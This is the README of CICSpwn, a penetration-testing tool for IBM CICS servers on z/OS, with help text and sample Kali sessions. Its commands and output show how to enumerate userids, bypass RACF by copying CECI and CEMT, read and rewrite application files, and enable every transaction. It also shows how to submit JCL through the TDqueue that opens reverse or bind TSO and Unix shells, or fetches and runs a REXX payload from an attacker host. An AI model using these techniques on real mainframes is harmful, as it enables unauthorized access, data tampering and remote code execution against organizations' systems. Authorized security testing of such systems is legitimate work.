CICSpwn is a tool to pentest CICS Transaction servers on z/OS.
- Get general information about CICS and the underlying z/OS
- List available IBM supplied transactions
- Get active sessions and userids
- Get path (HLQ) of files and libraries
- Check if CICS is using RACF/ACF2/TopSecret
- Read files created by the application
- Enables CECI and CEMT if they are RACF protected
- Remotely execute code using Spoolopen and TDqueue
- Checks security settings on z/OS
$python -h
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The tool for some CICS p0wning ! Author: @Ayoul3__
CicsPwn: a tool to pentest CICS transaction servers on z/OS
positional arguments:
IP The z/OS Mainframe IP or Hostname
PORT CICS/VTAM server Port
optional arguments:
-h, --help show this help message and exit
-a APPLID, --applid APPLID
CICS ApplID on VTAM, default is CICS
General information:
-A, --all Gather all information about a CICS Transaction Server
-i, --info Gather basic information about a CICS region
-u, --userids Scrape userids found in different menus
-p PATTERN, --pattern PATTERN
Specify a pattern of a files/transaction/tsqueue to
get (default is "*")
-q, --quiet Remove Trailing and journal before performing any
--ceci CECI CECI new transaction name. Result of -i option.
--cemt CEMT CEMT new transaction name. Result of -i option.
--bypass if CEDA is available, it copies CEMT and CECI to new
transid which bypasses RACF
-b OLD_TRAN if CEDA is available, it copies OLD_TRAN to NEW TRAN
(-n option) to bypass RACF. if no NEW TRAN is
specified, CICSpwn chooses an IBM supplied transaction
always available
-n NEW_TRAN if CEDA is available, it copies OLD_TRAN (-b) to NEW
TRAN to bypass RACF
Storage options:
-f, --files List all installed files a on TS CICS
-e, --tsqueues List all temporary storage queues on TS CICS
--get-file FILENAME Get the content of a file. It attempts to change the
status of the file if it's not enabled, opened or
--get-tsq TSQ_NAME Get the content of a temporary storage queue.
--add-record FILENAME_ADD
Add a record (--num) to FILE. if NUM exists, updates
the record
--add-item TSQUEUE_ADD
Add an item (--num) to TSqueue. if NUM exists, updates
the item
--num ITEM # item to read/add/update from a file or TSQueue
--data DATA file containing new data to update the file
Transaction options:
-t, --trans Get all installed transactions on a CICS TS server
--enable-trans ENA_TRANS
Enable a transaction (keyword ALL to enable every
--check-trans CHECK_TRANS
Checks security access to the transactions specified
in <file.txt>
--check-files CHECK_FILES
Checks security access to the files specified in
Access options:
-U USERID, --userid USERID
Specify a userid to use on CICS
Specify a password for the userid
-r PROPAGATE_USER Given the region user ID, checks wether you are
allowed to use it to submit JOBs
-g SURROGAT_USER Checks wether you can impersonate another user when
submitting a job
JOB options:
-s SUBMIT, --submit SUBMIT
Submit JCL to CICS server. Specify:
dummy,reverse_unix, reverse_tso, direct_unix,
reverse_unix, ftp or custom (need -j option)
--queue QUEUE Provides the name of the TD queue to submit a JOB
--ftp-cmds FTP_CMDS Files containig a list of ftp commands to execute
--node NODE System node name where the JOB should be submitted
(works only with Spool functions)
-l LHOST, --lhost LHOST
Remote server to call back to for reverse shell
--port PORT Remote port to open for bind shell in REXX
--jcl JCL Custom JCL file to provide
--rexx REXX_FILE Custom REXX file to execute in memory. No label or
line continuation must be present in the file
3270 Python library py3270
x3270 s3270
wc3270.exe installed on your sytem
root@kali:~/cics# python -a CICS 23 -i
[+] Connecting to target
[*] Access to CICS Terminal is possible with APPID CICS
[+] Getting information about CICS server (APPLID: CICS)
[*] CICS TS Version: 3.2
[*] CICS default user: CICSUSER
[+] Interesting and available IBM supplied transactions:
[*] CEMT
[*] CEDA
[*] CECI
[*] CECS
[*] CEBR
[+] General system information:
[*] Userid: CICSUSER
[*] Sysid: S650
[*] LU session name: LCL702
[*] language: E
[*] Files HLQ: CICS650.**
[*] Library path: DFH320.CICS.**
[+] Active users
[+] JCL Submission
[*] Access to the internal spool is apparently available
[+] Access control
[*] CICS does not use RACF/ACF2/TopSecret. Every user has as much access as the CICS region ID
root@kali:~/cics# python -a CICS 23 --get-file FILEA
[+] Connecting to target
[*] Access to CICS Terminal is possible with APPID CICS
[+] Getting Attributes of file FILEA
[*] File FILEA is enabled, open, and readable
[*] Record size: 80 keylength:6
' 000100': START OF DATA
Ps: adding --num option fetches only one record
root@kali:~/cics# python -a CICS 23 --add-record FILEA --num ' 400018' --data file.txt
[[+] Connecting to target
[*] Access to CICS Terminal is possible with APPID CICS
[*] File FILEA is enabled and open
[*] Record size: 80 keylength:6
[+] Adding record 400018 of file FILEA
[*] Record 400018 was added successfully to file FILEA
PS: if record number 400018 exists, CICSpwn updates the record automatically so please be careful.
root@kali:~/cics# python -a CICS 23 -e
[+] Connecting to target
[*] Access to CICS Terminal is possible with APPID CICS
[+] Getting all tsqueues that match *
Tsqueue Items Length Transaction
KOS5 00001 0000000064 CECI
TEST 00001 0000000064 CECI
TES5 00001 0000000064 CECI
root@kali:~/cics# python 23 -a CICS -U AYOUB -P AYOU1 --enable-tran ALL
[+] Connecting to target
[*] Access to CICS Terminal is possible with APPID CICS
[*] Successful authentication
[+] Activating ALL transactions
[*] All transactions are enabled
root@kali:~/cics# python -a CICS 23 -s reverse_tso -l
[+] Connecting to target
[*] Access to CICS Terminal is possible with APPID CICS
[+] Setting the current terminal to mixed case
[*] Got TerminalID L702
[*] Current terminal is NOW mixed case
[+] Spool not available apparently, trying via TDQueue
[+] Writing to the internal TDQueue
[*] JCL Written to TDqueue, it should be executed any second
- Reverse_tso: spawns a reverse tso shell to the host specified by --lhost ip:port option.
- direct_tso: same as reverse_tso but binds the shell to --port option
- reverse_unix: spawns a reverse unix shell to the host specified by --lhost ip:port option.
- direct_unix: same as reverse_unix but binds the shell to --port option
- ftp: connects to a remote ftp server specified by --lhost ip:port and executes commands specified in file --ftp-cmds
- reverse_rexx: writes a dropper to disk that fetches a rexx payload from --lhost ip:port and executes it in memory. The listener is handled by CICSpwn. The only constraint is that the rexx file must not contain labels or continuation lines
- custom: sends a custom JCL specified by --jcl option
- dummy: executes ftp to --lhost ip:port to make sure reverse connection is possible
CICSpwn is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
CICSpwn is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with nmaptocsv. If not, see
The REXX code of the direct/reverse shell was mainly inspired by the work of @mainframed767
Py3270 wrapper class was provided by @singe
Ayoub ELAASSAL ayoul3.zos at gmail dot com